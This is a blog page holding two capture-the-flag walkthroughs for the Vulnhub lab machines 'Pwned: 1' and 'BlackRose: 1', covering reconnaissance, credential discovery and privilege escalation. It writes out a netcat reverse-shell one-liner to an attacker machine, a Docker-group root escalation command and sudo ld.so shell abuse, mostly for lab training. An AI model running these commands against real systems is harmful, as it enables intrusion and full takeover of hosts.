Pwned-1: Vulnhub Walkthorugh

at 8:47 AM Saturday, July 18, 2020 0 comments

Today we are going to solve another boot2root challenge called "Pwned: 1". It's available at Vulnhub for penetration testing. This is an easy level lab.

The credit for making this lab goes to Ajs Walker. Let's get started and learn how to successfully break it down.
 Level: Easy
Since these labs are available on the Vulnhub website so we will download the lab file from here.
Penetration Testing Methodology
Recognition
§  Netdiscover
§  Nmap
Enumeration
§  Gobuster
Exploiting
  • Obtaining SSH private key backup
Privilege Escalation
§  Abuse of sysadmin script.
§  Abuse of Docker Group privileges
§  Capture the flag
Walkthrough
Recognition
As always, we identify the host's IP with the "Netdiscover" tool:
netdiscover


Now start by listing all the TCP ports with the help of Nmap.
nmap   –sV  -sC  -P-192.168.10.192


To work more comfortably, I'll put the IP address in /etc/hosts.


Enumeration
Now, we have entered the web service and found information about the hacker "Annlynn" in the body and commented lines of the source code.



We have used Gobuster with a medium directory dictionary, indicating the typical extensions.



We will access the directory "/hidden_text" and will find a file named as "secret.dic", this contains a directory listing.  

After checking with Gobuster, we saw that only the directory "/pwned.vuln" is available.



Exploiting (user “Ariana”)
We found an administration panel exposed, after trying the typical passwords to try to access and not succeed, we went to check the source code and found that there is condition in PHP with some credentials. The user already gave us the clue for which service to use (FTP).



We connect to the FTP service with the obtained credentials, we find an SSH private key for the user "Ariana" and a note.



Now we have changed the permissions to the file "id_rsa" and connect through SSH with the user "Ariana". Once inside, we can read the first flag.


Privilege Escalation (user “Selena”)

We execute the command "sudo -l", evidencing that we are able to execute a script called "messenger.sh" as the user "selena". If we check the code, we can verify that it executes the information in "$msg 2> /dev/null". Given this, we could insert a "/bin/bash" so that it raises a shell with the user we have previously indicated in the script.



We start the script...
We indicate the user "selena", type “/bin/bash”... That's right! We have obtained a shell with this user, we read the 2nd flag.

Privilege Escalation (root)

We type "id" and list that we belong to the group "Docker", then we check the docker images that we have available and execute the command that will allow us to escalate privileges with a shell as root.  
Finally, we will read the flag.
docker run -v /:/mnt --rm -it privesc chroot /mnt sh



Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks
Contacted on LinkedIn and Twitter.
Labels:

BlackRose: 1 Vulnhub Walkthrough

at 4:48 AM 0 comments
Today we are going to solve another boot2root challenge called "BlackRose: 1".  It's available at VulnHub for penetration testing, you can download this from here.

The credit goes to BadLamer for designing this VM machine. Let's start and learn how we can break this down.

Level: Hard

Penetration Testing Methodology

Reconnaissance
·         Nmap
Enumeration
·         Steghide
Exploiting
·         ByPassing PHP strcmp()
·         Remote Command Execute (RCE) from the application web
·         Use of cryptography and cyphers (Cyberchef & others)
Privilege Escalation
·         Abuse binary ld.so
·         Cracking SSH Keys with John
·         Reversing binary with Ghidra
·         Abuse script with Filter ByPass extensions and WAF application
·         Capture the flag
Walkthrough
Reconnaissance
So, let's start this all by running up “nmap” with an “aggressive scan”, in order to capture the ports with the enabled operating system, software versions, scripts and traceroutes.
nmap -A –p- 192.168.1.21



Enumeration
As we enter the website, we were presented with an authentication system, which thus allows us to enter some credentials or to register ourselves into it.


On the other hand, we noticed a background image behind the login portal, thus we downloaded it in order to check whether it contains any specific information or not. As we track it over the steghide tool, we got something but we lacked with a key to decipher it.


Exploiting
After trying to evade the form with other techniques, we were clear that this website is vulnerable to "strcmp".
Let’s capture this request in burpsuite and check what we can have over in its response.
Request Burp:

Response Burp:



Great!! We execute the answer in our web browser and have bypassed the administration panel as "admin" user.


Now as we go further, inside this panel, we got a hash in "bcrypt" and there is a box to type the input command. But if you try to run the "ls" command, it will pop you back out with an error.
So let’s try to crack this captured hash through John The Ripper. As in the output result, you can see that we got the command as "whoami".



Let’s now try to execute the "whoami" command in the web-application.


Very well, as we are not aware of the application’s procedures, let’s then try to generate a hash in "bcrypt" with a command that will allow us to raise a reverse shell from our kali machine.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.22 1234 >/tmp/f


We’ll now set up a netcat listener at port 1234. Further, change up the field hash and rewrite the command:


Great!! We’ve successfully captured the victim's Shell.



Privilege Escalation (user “delx”)
Thus with the help of python, we’ll have our interactive shell, now it's time to get the privileges of the "delx" user.
To do this, we will execute the command "sudo -l" and check whether we can make the use of a binary called "ld.so", as easy as running:

sudo -u delx /bin/ld.so /bin.sh

From the below image, you can see that we got the shell with the user.


As we traverse the files of the user "delx",  we encounter that it is having the directory as  ".ssh", copy the "id_rsa" file and try to crack it with "ssh2john", JohnTheRipper and the rockyou dictionary.



Great!! We can now connect it via SSH!


 Privilege Escalation (user “yourname”)
Let’s surf the files that were having access to the user "delx" and during the procedure, we were encountered with a binary file called "showPassword".


 Thus the binary will be used to check a password to decipher the content that is marked in green.


We will analyze the code with Ghidra (you can even use some other), check for its decompiler and list the password inside it.


We go back to the binary, type the password and check whether it is correct or not.


Let’s try to decipher the content over some online tools. I’ve used AES encryption to do so. From the below image, you can see that we are now again having another encrypted text to entertain.


After testing this key with all the 3 users, it didn’t work for any of them. Do you remember the background image that we’ve downloaded in the beginning?
Let’s try to do it here.


After checking every possible way, we finally decrypted it as "ROT47".


Let’s now try the password with the user "yourname" and therefore we’ve finally captured the flag of "user.txt".


 Privilege Escalation (root)
Fire up "sudo -l" and list a script which we can execute as "root".
As we tried to execute it, we got prompted with a message as “Invalid file read”


It’s clear that we do not have access to the script, but it is also understandable that it can be filtered by the extensions.
After trying to read different extensions, we find one that worked for us i.e. "PHP"!


As you can see, it passes the extension filter, but it doesn't run the content. This can be because the script might have the "WAF" function and filters some words.
After some documentation, I modified the proof of concept and I managed to bypass the "WAF".


Well, let's not waste any more time, and add up "/bin/sh" in order to capture the root’s shell to read the contents of the file "root.txt".


Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contacted on LinkedIn and Twitter.

Labels:
Subscribe to: Comments (Atom)